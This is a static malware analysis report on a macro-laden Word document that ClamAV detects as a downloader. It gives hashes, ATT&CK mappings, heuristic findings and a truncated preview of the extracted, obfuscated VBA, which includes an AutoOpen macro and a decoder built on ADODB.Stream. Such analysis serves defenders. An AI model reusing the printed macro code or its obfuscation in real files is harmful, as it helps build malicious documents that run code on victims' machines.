Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 7d3a7e7ea90ba8dc…

MALICIOUS

Office (OLE)

161.5 KB Created: 2017-05-04 16:42:00 Authoring application: Microsoft Office Word First seen: 2017-05-13
MD5: 3a8552d676e08703f8201a52889f8802 SHA-1: d4719b7a118eb757ce7214b926d4507a9319fbaf SHA-256: 7d3a7e7ea90ba8dc0fe9761ac4fa5e7017373fe8f0c0b8bfc7e3c70e9c98f98c
282 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing VBA macros. The AutoOpen macro is present and uses CreateObject and Shell() calls, indicating an attempt to execute arbitrary code. This is consistent with a downloader or droppper malware designed to fetch and run a second-stage payload. The ClamAV detection also confirms its malicious nature.

Heuristics 8

  • ClamAV: Doc.Downloader.WithMacro-6310867-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.WithMacro-6310867-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 16550 bytes
SHA-256: 4fd19edf82cb3e8f53731aa76dff233e2465e8035a47721d55b1b6cca475da5b
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
Sub AutoOpen()

Dim DXKcs As Byte
DXKcs = 223
Dim drxoT As Boolean
drxoT = False
Dim OzQdX As Byte
OzQdX = 132
Dim aCNED As Single
aCNED = Val(38096.700924199)
Dim KJvn6eqr
KJvn6eqr = LCase(iTisf98)
ao3CG7eT
End Sub

Attribute VB_Name = "Module2"
Public Function gAuRQ(ByVal I0b5iIS)
Dim mUoTIw As Double
mUoTIw = Val(32502.763272077)
Dim VBtmLa0 As Single
VBtmLa0 = Sgn(14353.053151931)
Dim zl9eX
Dim u8D4ZvPAa

Dim jiQw48gav As Long
jiQw48gav = -2003272256
Dim bJqpnUBax
bJqpnUBax = Len(cQOTBfn)

Dim JnfPY As Integer
JnfPY = 10733
Dim kge5LvCN As Long
kge5LvCN = Sgn(-479446318)
Set zl9eX = CreateObject(oBJxv)

Dim qoLpzi As Integer
qoLpzi = -22503
Dim zQTRiou As Byte
zQTRiou = 111
Dim Vi71TFm9 As Single
Vi71TFm9 = 19600.033381308
Set u8D4ZvPAa = zl9eX.CreateElement(IVcEO2l6)
Dim FQDFZlkh As Double
FQDFZlkh = Sgn(61160.349166364)
Dim vJvytm As Single
vJvytm = Int(18487.402532009)
Dim mB0xkD4 As Single
mB0xkD4 = 36055.464712362
With u8D4ZvPAa
Dim ZcQs8TqW As Integer
ZcQs8TqW = Sgn(30624)
Dim qciD6d As Boolean
qciD6d = True
u8D4ZvPAa.DataType = "bin." & IVcEO2l6
Dim NT9Wf4V As Long
NT9Wf4V = Sgn(-459281258)
Dim JI1jn4urU As Boolean
JI1jn4urU = False
u8D4ZvPAa.Text = I0b5iIS
End With
Dim OHPeCAso As Single
OHPeCAso = Sgn(16163.419619824)
Dim JIy8CgA As Single
JIy8CgA = Int(56208.815364551)
Dim YMNiz
YMNiz = Val(UXuMyt8Ob)
Dim hiGZQ7pj As Byte
hiGZQ7pj = 242
Dim sS2dpc1Te As Long
sS2dpc1Te = 0
gAuRQ = qRdoV(u8D4ZvPAa.nodeTypedValue)
Dim qvrWaQ As Integer
qvrWaQ = Sgn(10387)
Dim Kef2D9B As Long
Kef2D9B = Sgn(0)
Dim Yp6gXziR As Single
Yp6gXziR = 29579.491087246
Set u8D4ZvPAa = Nothing
Set zl9eX = Nothing
End Function
Function qRdoV(Binary)
Dim RtDxhTcs As Integer
RtDxhTcs = Sgn(-14625)
Dim zZ3HxTO As Double
zZ3HxTO = Int(6285.1011814613)
Const Bvg2N = 2
Const kBF8v = 1
Dim b7ODQ3 As Integer
b7ODQ3 = Sgn(17197)
Dim UdlwjH As String
UdlwjH = AscB("E")
Dim CmcfyFl As Single
CmcfyFl = 43735.14494797
Dim sVA8f
Dim H0bwSm As Single
H0bwSm = Round(55704.681716492)
Dim fmRDx
fmRDx = Val("m")
Dim GxZv19s As Long
GxZv19s = -1876602424
Dim Xt5AZekB As Double
Xt5AZekB = Sgn(20667.044930352)
Dim RshtZxF As String
RshtZxF = AscB("J")
Dim OxV0kCT As Long
OxV0kCT = 0
Set sVA8f = CreateObject("adodb.stream")
Dim PfT8Mb5 As Integer
PfT8Mb5 = Sgn(-9952)
Dim o8FXdlj3 As Integer
o8FXdlj3 = Sgn(-13948)
Dim Be0n5bPrS As String
Be0n5bPrS = Val("8")
With sVA8f

Dim jgOnlQVpJ As Boolean
jgOnlQVpJ = True
Dim cgheW As Byte
cgheW = 133
Dim i2Ef90XiW As Single
i2Ef90XiW = 54552.535355803
.Type = kBF8v
Dim B3Sn7gcm As Single
B3Sn7gcm = Sgn(37415.222443235)
Dim khP0CbiVI As Boolean
khP0CbiVI = True
Dim AB6gF As Single
AB6gF = Fix(47611.159975582)
Dim vfDUEAl
vfDUEAl = Trim(lfFO8uIM)
Dim y6xnfP9 As Single
y6xnfP9 = Sgn(8801.0150691247)
.Open
Dim z9CSzL
z9CSzL = Len(ZngbJQ62I)
Dim ZArsw4Fk0 As Byte
ZArsw4Fk0 = 250
Dim pu3bv As Integer
pu3bv = Sgn(-15340)
Dim ucCYVoD
ucCYVoD = Len(rOZ1ugmlD)
Dim L0doNbw56 As Boolean
L0doNbw56 = True
.Write Binary
Dim BwY6zlp
BwY6zlp = Val("h")
Dim u7dov25
u7dov25 = Val(Pevcm)
.Position = 0

Dim EtNkVjuYb As Byte
EtNkVjuYb = 157
Dim tvHqDX As String
tvHqDX = AscW("F")
Dim aSoObc As Boolean
aSoObc = True
.Type = Bvg2N

Dim pvNUy As Byte
pvNUy = 131
Dim p1vU5ZxrT As Byte
p1vU5ZxrT = 199
Dim cFb4MNtEx
cFb4MNtEx = "2"
Dim pw1ZXkxtz As Single
pw1ZXkxtz = Sgn(30880.240866816)
Dim Gye8v5sjJ
Gye8v5sjJ = Len(bmGPOM)

Dim u2j6hO5 As Boolean
u2j6hO5 = True
Dim xU6KDP As Single
xU6KDP = Sgn(17094.792335229)
.CharSet = "ascii"

Dim p2pKoJzPL As Long
p2pKoJzPL = 0
Dim CYMhtXVj1 As Long
CYMhtXVj1 = Sgn(0)
Dim e2Ko3mv As Boolean
e2Ko3mv = True
Dim suvhY42p As S
... (truncated)